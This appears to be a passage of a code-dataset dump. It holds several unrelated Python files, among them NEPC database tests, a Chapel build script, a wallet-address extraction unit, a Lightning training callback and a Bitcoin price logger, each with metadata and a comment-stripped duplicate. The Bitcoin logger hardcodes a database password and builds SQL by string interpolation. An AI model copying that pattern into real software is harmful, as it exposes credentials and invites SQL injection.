delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
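        # Columns 0 and 11-14 hold integers and columns 2, 3, 9, 10, 16, 17
        # hold floats in the .met files; '\N' is the TSV marker MySQL uses
        # for NULL, so those entries stay as strings (see the casts below).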
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
| 39.552632
| 92
| 0.578399
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
import csv
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
| true
| true
|
790dccae985884711795bd64d05aa6e0beaa90d5
| 2,068
|
py
|
Python
|
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
util/chplenv/chpl_unwind.py
|
ShreyasKhandekar/chapel
|
811ad7f6cfa35c6d88f344a90743fe5f9d3c980b
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import sys
import chpl_platform, overrides, third_party_utils
from utils import error, memoize, warning
@memoize
def get():
platform_val = chpl_platform.get('target')
linux = platform_val.startswith('linux64')
osx = platform_val.startswith('darwin')
val = overrides.get('CHPL_UNWIND')
if val == 'libunwind':
warning("CHPL_UNWIND=libunwind is deprecated. Use CHPL_UNWIND=bundled.")
val = 'bundled'
if linux:
if val == 'bundled':
return 'bundled'
elif val == 'system':
return 'system'
if osx:
if val == 'bundled':
error("Using CHPL_UNWIND=bundled is not supported on Mac OS X."
"\nUse CHPL_UNWIND=system instead.", ValueError)
elif val == 'system':
return 'system'
return 'none'
@memoize
def get_uniq_cfg_path():
return third_party_utils.default_uniq_cfg_path()
@memoize
def get_link_args(unwind):
platform_val = chpl_platform.get('target')
osx = platform_val.startswith('darwin')
# Mac OS X supports libunwind in the C library
# it's not actually a special library.
if osx:
return []
libs = []
# Get the link arguments (e.g. -lunwind)
if unwind == 'system':
# Try using pkg-config to get the libraries to link
# libunwind with.
libs = third_party_utils.pkgconfig_get_link_args(
'libunwind', system=True, static=True)
elif unwind == 'bundled':
# the pkg-config file for libunwind is nice, but as of 1.1
# it doesn't include -lzma when it probably should.
# So try to get the libraries out of libunwind.la.
libs = third_party_utils.default_get_link_args(
'libunwind', libs=['libunwind.la', 'libunwind-x86_64.la'])
# add -ldl so that we can call dladdr
if "-ldl" not in libs:
libs.append("-ldl")
return libs
def _main():
unwind_val = get()
sys.stdout.write("{0}\n".format(unwind_val))
if __name__ == '__main__':
_main()
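# Usage sketch (inferred from _main above, not from project docs): on a
# linux64 target, `CHPL_UNWIND=system python3 util/chplenv/chpl_unwind.py`
# prints "system"; with no override set it prints "none".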
| 27.210526
| 81
| 0.626692
|
import sys
import chpl_platform, overrides, third_party_utils
from utils import error, memoize, warning
@memoize
def get():
platform_val = chpl_platform.get('target')
linux = platform_val.startswith('linux64')
osx = platform_val.startswith('darwin')
val = overrides.get('CHPL_UNWIND')
if val == 'libunwind':
warning("CHPL_UNWIND=libunwind is deprecated. Use CHPL_UNWIND=bundled.")
val = 'bundled'
if linux:
if val == 'bundled':
return 'bundled'
elif val == 'system':
return 'system'
if osx:
if val == 'bundled':
error("Using CHPL_UNWIND=bundled is not supported on Mac OS X."
"\nUse CHPL_UNWIND=system instead.", ValueError)
elif val == 'system':
return 'system'
return 'none'
@memoize
def get_uniq_cfg_path():
return third_party_utils.default_uniq_cfg_path()
@memoize
def get_link_args(unwind):
platform_val = chpl_platform.get('target')
osx = platform_val.startswith('darwin')
if osx:
return []
libs = []
# Get the link arguments (e.g. -lunwind)
if unwind == 'system':
# Try using pkg-config to get the libraries to link
# libunwind with.
libs = third_party_utils.pkgconfig_get_link_args(
'libunwind', system=True, static=True)
elif unwind == 'bundled':
# the pkg-config file for libunwind is nice, but as of 1.1
# it doesn't include -lzma when it probably should.
libs = third_party_utils.default_get_link_args(
'libunwind', libs=['libunwind.la', 'libunwind-x86_64.la'])
if "-ldl" not in libs:
libs.append("-ldl")
return libs
def _main():
unwind_val = get()
sys.stdout.write("{0}\n".format(unwind_val))
if __name__ == '__main__':
_main()
| true
| true
|
790dccb5c8ce8196f72ffe4f4be41dd4a837a2c2
| 1,019
|
py
|
Python
|
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
refinery/units/pattern/xtw.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.units.pattern import PatternExtractor
from refinery.units import RefineryCriticalException
from refinery.lib.patterns import wallets
class xtw(PatternExtractor):
"""
Extract Wallets: Extracts anything that looks like a cryptocurrency wallet address.
This works similar to the `refinery.xtp` unit.
"""
def __init__(self, stripspace=False, duplicates=False, longest=False, take=None):
self.superinit(super(), **vars(), ascii=True, utf16=True)
def process(self, data):
pattern = '|'.join(F'(?P<{p.name}>{p.value})' for p in wallets).encode('latin1')
def check(match):
for name, value in match.groupdict().items():
if value is not None:
break
else:
raise RefineryCriticalException('Received empty match.')
return self.labelled(value, kind=name)
yield from self.matches_filtered(memoryview(data), pattern, check)
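# A hedged usage sketch (assuming the usual binary refinery pipeline syntax
# and the `ef` file-emitting unit, neither of which appears in this file):
#   ef sample.bin | xtw
# would list candidate wallet addresses, each labelled with a `kind` meta
# variable naming the matched pattern (see check above).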
| 35.137931
| 88
| 0.651619
|
from refinery.units.pattern import PatternExtractor
from refinery.units import RefineryCriticalException
from refinery.lib.patterns import wallets
class xtw(PatternExtractor):
def __init__(self, stripspace=False, duplicates=False, longest=False, take=None):
self.superinit(super(), **vars(), ascii=True, utf16=True)
def process(self, data):
pattern = '|'.join(F'(?P<{p.name}>{p.value})' for p in wallets).encode('latin1')
def check(match):
for name, value in match.groupdict().items():
if value is not None:
break
else:
raise RefineryCriticalException('Received empty match.')
return self.labelled(value, kind=name)
yield from self.matches_filtered(memoryview(data), pattern, check)
| true
| true
|
790dcdff0a0df3dd5d7ac7d87dc2aa691f1779d3
| 3,132
|
py
|
Python
|
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | 5
|
2022-03-21T12:39:01.000Z
|
2022-03-31T06:02:01.000Z
|
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | null | null | null |
finite_element_networks/lightning/callbacks.py
|
martenlienen/finite-element-networks
|
5e8f6ecc473d1e93ccf366fcc45a47b08492ffde
|
[
"MIT"
] | 1
|
2022-03-26T02:58:58.000Z
|
2022-03-26T02:58:58.000Z
|
import pytorch_lightning as pl
from pytorch_lightning.utilities.parsing import lightning_getattr, lightning_setattr
class MultipleShootingCallback(pl.Callback):
"""This callback increases the length of the training sequences each epoch.
This technique is well known in the SciML community and documented in their tutorials
[1] as a way to avoid falling into local minima when training ODE based models. We can
also see this as an instance of multiple shooting [2, 3] in the data space, where the
penalty function enforcing the equality constraints at the splitting points is equal
to the loss function.
Note that the number of target steps will never increase over the initial number of
target steps configured in the data module.
[1] https://diffeqflux.sciml.ai/dev/examples/local_minima/
[2] https://diffeqflux.sciml.ai/dev/examples/multiple_shooting/
[3] Evren Mert Turan, Johannes Jäschke, "Multiple shooting for training neural
differential equations on time series", https://arxiv.org/abs/2109.06786
Attributes
----------
initial_steps
Number of target steps in the first epoch
increase
The target steps increase by this much in each following epoch
target_steps_attr
Name of the data module attribute that should be modified
"""
def __init__(
self,
*,
initial_steps: int = 3,
increase: int = 1,
target_steps_attr: str = "train_target_steps",
):
super().__init__()
self.initial_steps = initial_steps
self.increase = increase
self.target_steps_attr = target_steps_attr
self.initial_target_steps = None
def on_train_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
self.initial_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
# Set the initial steps in this hook because the trainer selects the train
# dataloader internally before train_epoch_start is called.
lightning_setattr(pl_module, self.target_steps_attr, self.initial_steps)
trainer.reset_train_dataloader(pl_module)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
pl_module.log(
self.target_steps_attr,
float(lightning_getattr(pl_module, self.target_steps_attr)),
on_step=False,
on_epoch=True,
)
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
# Trainer loads the data loader before the train_epoch_start hook is called, so we
# set the target steps already at the end of the previous epoch
prev_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
target_steps = prev_target_steps + self.increase
if self.initial_target_steps is not None:
target_steps = min(target_steps, self.initial_target_steps)
if target_steps != prev_target_steps:
lightning_setattr(pl_module, self.target_steps_attr, target_steps)
trainer.reset_train_dataloader(pl_module)
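# A minimal usage sketch (assuming a standard Lightning setup; the attached
# data module must expose the `train_target_steps` attribute documented
# above):
#
#   callback = MultipleShootingCallback(initial_steps=3, increase=1)
#   trainer = pl.Trainer(max_epochs=50, callbacks=[callback])
#   trainer.fit(model, datamodule=dm)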
| 43.5
| 90
| 0.715837
|
import pytorch_lightning as pl
from pytorch_lightning.utilities.parsing import lightning_getattr, lightning_setattr
class MultipleShootingCallback(pl.Callback):
def __init__(
self,
*,
initial_steps: int = 3,
increase: int = 1,
target_steps_attr: str = "train_target_steps",
):
super().__init__()
self.initial_steps = initial_steps
self.increase = increase
self.target_steps_attr = target_steps_attr
self.initial_target_steps = None
def on_train_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
self.initial_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
lightning_setattr(pl_module, self.target_steps_attr, self.initial_steps)
trainer.reset_train_dataloader(pl_module)
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
pl_module.log(
self.target_steps_attr,
float(lightning_getattr(pl_module, self.target_steps_attr)),
on_step=False,
on_epoch=True,
)
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule):
prev_target_steps = lightning_getattr(pl_module, self.target_steps_attr)
target_steps = prev_target_steps + self.increase
if self.initial_target_steps is not None:
target_steps = min(target_steps, self.initial_target_steps)
if target_steps != prev_target_steps:
lightning_setattr(pl_module, self.target_steps_attr, target_steps)
trainer.reset_train_dataloader(pl_module)
| true
| true
|
790dceeee3e32779d9ead14d2c0c4b5ea90fb07e
| 1,946
|
py
|
Python
|
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
zuul.d/octavia/tests/unit/common/test_config.py
|
yi-cloud/octavia
|
b7f5cfa4c3c454925a90c24984049539228806d7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014, Doug Wiegley, A10 Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
import octavia.common.config as config
import octavia.tests.unit.base as base
class TestConfig(base.TestCase):
def test_sanity(self):
config.init([])
config.setup_logging(cfg.CONF)
# Resetting because this will cause inconsistent errors when run with
# other tests
self.addCleanup(cfg.CONF.reset)
def test_validate_server_certs_key_passphrase(self):
conf = self.useFixture(oslo_fixture.Config(config.cfg.CONF))
conf.config(
group="certificates",
server_certs_key_passphrase="insecure-key-do-not-use-this-key"
)
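        # The accepted passphrase above is exactly 32 characters from a
        # restricted charset; the assertions below probe too-short, too-long
        # and invalid-character inputs against that (inferred) constraint.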
# Test too short
self.assertRaises(ValueError, conf.config,
group="certificates",
server_certs_key_passphrase="short_passphrase")
# Test too long
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="long-insecure-key-do-not-use-this")
# Test invalid characters
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="insecure-key-do-not-u$e-this-key")
| 37.423077
| 79
| 0.660843
|
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
import octavia.common.config as config
import octavia.tests.unit.base as base
class TestConfig(base.TestCase):
def test_sanity(self):
config.init([])
config.setup_logging(cfg.CONF)
self.addCleanup(cfg.CONF.reset)
def test_validate_server_certs_key_passphrase(self):
conf = self.useFixture(oslo_fixture.Config(config.cfg.CONF))
conf.config(
group="certificates",
server_certs_key_passphrase="insecure-key-do-not-use-this-key"
)
self.assertRaises(ValueError, conf.config,
group="certificates",
server_certs_key_passphrase="short_passphrase")
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="long-insecure-key-do-not-use-this")
self.assertRaises(
ValueError, conf.config, group="certificates",
server_certs_key_passphrase="insecure-key-do-not-u$e-this-key")
| true
| true
|
790dd0e09ae1d8a6244aea4ae0d4ef34ef667fe1
| 771
|
py
|
Python
|
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
server/models/bitcoin_price_API.py
|
johnjdailey/JS-Realtime-Dashboard
|
aa62cab32096fbd4bdb8be657dd99d3d162e7097
|
[
"MIT"
] | null | null | null |
import requests
from datetime import datetime
import psycopg2
import time
def setup():
# Create database connection
conn = psycopg2.connect(database="postgres", user="postgres",
password="password", host="127.0.0.1", port="5432")
return conn
def call_api():
URL = "https://api.coindesk.com/v1/bpi/currentprice.json"
conn = setup()
    while True:
r = requests.get(url=URL)
current_time = datetime.now()
data = r.json()
price = data["bpi"]["USD"]["rate_float"]
cur = conn.cursor()
cur.execute(
f"INSERT INTO BT_Price (Created_at,Price) VALUES ('{str(current_time)}', {price})")
conn.commit()
time.sleep(15)
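# A hedged alternative to the f-string INSERT above: psycopg2 escapes bound
# parameters itself, which sidesteps quoting problems with the interpolated
# timestamp. This helper is a sketch, not part of the original script.
def insert_price(conn, created_at, price):
    # %s placeholders let psycopg2 adapt the datetime and float safely
    with conn.cursor() as cur:
        cur.execute("INSERT INTO BT_Price (Created_at, Price) VALUES (%s, %s)",
                    (created_at, price))
    conn.commit()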
if __name__ == "__main__":
call_api()
| 24.870968
| 95
| 0.597925
|
import requests
from datetime import datetime
import psycopg2
import time
def setup():
conn = psycopg2.connect(database="postgres", user="postgres",
password="password", host="127.0.0.1", port="5432")
return conn
def call_api():
URL = "https://api.coindesk.com/v1/bpi/currentprice.json"
conn = setup()
    while True:
r = requests.get(url=URL)
current_time = datetime.now()
data = r.json()
price = data["bpi"]["USD"]["rate_float"]
cur = conn.cursor()
cur.execute(
f"INSERT INTO BT_Price (Created_at,Price) VALUES ('{str(current_time)}', {price})")
conn.commit()
time.sleep(15)
if __name__ == "__main__":
call_api()
| true
| true
|
790dd1c98aa84804fd6deae9806710c465315553
| 528
|
py
|
Python
|
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
ex009a.py
|
emerfelippini/Curso_em_video-Aulas_Python
|
5b1d78b259732bb9bbad27cd30ce91bba77c5ef0
|
[
"MIT"
] | null | null | null |
a = int(input('Digite um número para saber sua tabuada :'))
n1 = a*1
n2 = a*2
n3 = a*3
n4 = a*4
n5 = a*5
n6 = a*6
n7 = a*7
n8 = a*8
n9 = a*9
n10 = a*10
print('A sua tabuada é')
print('{} x 1 = {}'.format(a, n1))
print('{} x 2 = {}'.format(a, n2))
print('{} x 3 = {}'.format(a, n3))
print('{} x 4 = {}'.format(a, n4))
print('{} x 5 = {}'.format(a, n5))
print('{} x 6 = {}'.format(a, n6))
print('{} x 7 = {}'.format(a, n7))
print('{} x 8 = {}'.format(a, n8))
print('{} x 9 = {}'.format(a, n9))
print('{} x 10 = {}'.format(a, n10))
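# A loop-based sketch equivalent to the lines above (an alternative, not
# part of the original straight-line exercise):
for c in range(1, 11):
    print('{} x {} = {}'.format(a, c, a * c))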
| 24
| 59
| 0.498106
|
a = int(input('Digite um número para saber sua tabuada :'))
n1 = a*1
n2 = a*2
n3 = a*3
n4 = a*4
n5 = a*5
n6 = a*6
n7 = a*7
n8 = a*8
n9 = a*9
n10 = a*10
print('A sua tabuada é')
print('{} x 1 = {}'.format(a, n1))
print('{} x 2 = {}'.format(a, n2))
print('{} x 3 = {}'.format(a, n3))
print('{} x 4 = {}'.format(a, n4))
print('{} x 5 = {}'.format(a, n5))
print('{} x 6 = {}'.format(a, n6))
print('{} x 7 = {}'.format(a, n7))
print('{} x 8 = {}'.format(a, n8))
print('{} x 9 = {}'.format(a, n9))
print('{} x 10 = {}'.format(a, n10))
| true
| true
|
790dd28cf200f8e4925057ba449528fba67df010
| 158
|
py
|
Python
|
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | null | null | null |
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | 13
|
2020-04-30T20:55:17.000Z
|
2021-08-23T04:02:51.000Z
|
projects/constants.py
|
IdmFoundInHim/streamsort
|
d55bdebd0c84d035affe087892712cf3e26974e5
|
[
"MIT"
] | null | null | null |
""" StreamSort Projects Extension -- Constants
Copyright (c) 2021 IdmFoundInHim, under MIT License
"""
SINGLE_MAX_MS = 15 * 60 * 1000
SINGLE_MAX_TRACKS = 4
| 22.571429
| 51
| 0.740506
|
SINGLE_MAX_MS = 15 * 60 * 1000
SINGLE_MAX_TRACKS = 4
| true
| true
|
790dd2ae5bdef111d96c5fc9702a39c1ef79d422
| 611
|
py
|
Python
|
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | 14
|
2020-01-24T21:52:51.000Z
|
2021-05-24T01:58:08.000Z
|
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | null | null | null |
bonus2/collateral/modules/library/test_module.py
|
kinther/ansible_course
|
5ff96b857d7b1ddb359526fed128feefba8ebb90
|
[
"Apache-2.0"
] | 26
|
2020-03-29T20:17:29.000Z
|
2022-03-28T19:13:40.000Z
|
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
def main():
# Define your modules arguments
module_args = dict(
name=dict(type="str", required=True),
new=dict(type="bool", required=False, default=False),
)
# Create an instance of the AnsibleModule class
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
# Define standard results
result = dict(changed=False, original_message="Something", message="It worked!!!")
# Return items as JSON
module.exit_json(**result)
if __name__ == "__main__":
main()
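# A hedged invocation sketch (argument names match module_args above):
#
#   - name: run the demo module
#     test_module:
#       name: example
#       new: true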
| 23.5
| 86
| 0.690671
|
from ansible.module_utils.basic import AnsibleModule
def main():
module_args = dict(
name=dict(type="str", required=True),
new=dict(type="bool", required=False, default=False),
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
result = dict(changed=False, original_message="Something", message="It worked!!!")
module.exit_json(**result)
if __name__ == "__main__":
main()
| true
| true
|
790dd3a146c61c8a59d268a9ef30aafa08803c2b
| 3,543
|
py
|
Python
|
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
dict_interdiff.py
|
Zafara1/MITx-6.00.1x
|
7ab0e5e188fae86685033954e774dfe07e03a639
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 08:23:08 2017
Author: Zachary W. Mikus
"""
#These are testing variables
d1 = {1:30, 2:20, 3:30, 5:80}
d2 = {1:40, 2:50, 3:60, 4:70}
def f(x, y):
k = x + y
return k
def commonKeys(longerList, shorterList):
commonKeyList = []
#Variables
#intersectDictionary = The final returned intersect dictionary
#commonKeyList = The list of keys that appear in both dictionaries
for i in range(len(longerList)):
if longerList[i] in shorterList:
commonKeyList.append(longerList[i])
return commonKeyList
def differentKeys(longerList, shorterList):
#This function uses similar logic to the commonKeys function
#Except it will see if the index is NOT in the other list and remove it
#This runs the loop twice once through each loop to find the missing numbers
#in each list
differentKeyList = []
for i in range(len(longerList)):
if longerList[i] not in shorterList:
differentKeyList.append(longerList[i])
for i in range(len(shorterList)):
if shorterList[i] not in longerList:
differentKeyList.append(shorterList[i])
return differentKeyList
def intersect(commonList, d1, d2):
intersectDict = {}
#This function takes the common list of keys, grabs the common values in
#both dictionaries and performs the f(x, y) function on them
for i in range(len(commonList)):
#currentIndex is the index in the dictionary, it will move
currentIndex = commonList[i]
x = d1[currentIndex]
y = d2[currentIndex]
functionValue = f(x, y)
intersectDict[currentIndex] = functionValue
return intersectDict
def difference(differentKeyList, d1, d2):
differenceDict = {}
#This function takes the different list of keys, grabs the relevant values and
#creates a dictionary
#searches d
for i in range(len(differentKeyList)):
currentIndex = differentKeyList[i]
if currentIndex in d1:
differenceDict[currentIndex] = d1[currentIndex]
if currentIndex in d2:
differenceDict[currentIndex] = d2[currentIndex]
return differenceDict
def diff_dictionary(d1, d2):
differentKeyList = []
#Turns key values in lists and finds the longest
#keyListD1 = list of keys in d1
#keyListD2 = list of keys in d2
keyListD1 = list(d1.keys())
keyListD2 = list(d2.keys())
#determines which of the two lists is the longest and assigned it values
#for the common list function
if len(keyListD1) > len(keyListD2):
longerList = keyListD1
shorterList = keyListD2
else:
longerList = keyListD2
shorterList = keyListD1
#Finds the common keys
commonList = commonKeys(longerList, shorterList)
#Makes the intersect dictionary
intersectDict = intersect(commonList, d1, d2)
#Finds the different keys
differentKeyList = differentKeys(longerList, shorterList)
#Makes the different key dictionary
differenceDict = difference(differentKeyList, d1, d2)
#This now creates a list of the dictionaries put together
return (intersectDict, differenceDict)
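# A set-based sketch of the same key split (an alternative formulation,
# not the approach used above): dict views support set algebra directly.
def diff_dictionary_sets(d1, d2):
    # keys in both dicts get f() applied; keys in exactly one are copied over
    inter = {k: f(d1[k], d2[k]) for k in d1.keys() & d2.keys()}
    diff = {k: d1[k] if k in d1 else d2[k] for k in d1.keys() ^ d2.keys()}
    return (inter, diff)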
# Note on the difference dictionary: it consists of every key/value pair
# that exists in one of the input dictionaries but not the other;
# differenceDict is the final returned difference dictionary.
print(diff_dictionary(d1, d2))
| 31.633929
| 82
| 0.686988
|
d1 = {1:30, 2:20, 3:30, 5:80}
d2 = {1:40, 2:50, 3:60, 4:70}
def f(x, y):
k = x + y
return k
def commonKeys(longerList, shorterList):
commonKeyList = []
for i in range(len(longerList)):
if longerList[i] in shorterList:
commonKeyList.append(longerList[i])
return commonKeyList
def differentKeys(longerList, shorterList):
differentKeyList = []
for i in range(len(longerList)):
if longerList[i] not in shorterList:
differentKeyList.append(longerList[i])
for i in range(len(shorterList)):
if shorterList[i] not in longerList:
differentKeyList.append(shorterList[i])
return differentKeyList
def intersect(commonList, d1, d2):
intersectDict = {}
for i in range(len(commonList)):
currentIndex = commonList[i]
x = d1[currentIndex]
y = d2[currentIndex]
functionValue = f(x, y)
intersectDict[currentIndex] = functionValue
return intersectDict
def difference(differentKeyList, d1, d2):
differenceDict = {}
for i in range(len(differentKeyList)):
currentIndex = differentKeyList[i]
if currentIndex in d1:
differenceDict[currentIndex] = d1[currentIndex]
if currentIndex in d2:
differenceDict[currentIndex] = d2[currentIndex]
return differenceDict
def diff_dictionary(d1, d2):
differentKeyList = []
keyListD1 = list(d1.keys())
keyListD2 = list(d2.keys())
if len(keyListD1) > len(keyListD2):
longerList = keyListD1
shorterList = keyListD2
else:
longerList = keyListD2
shorterList = keyListD1
commonList = commonKeys(longerList, shorterList)
intersectDict = intersect(commonList, d1, d2)
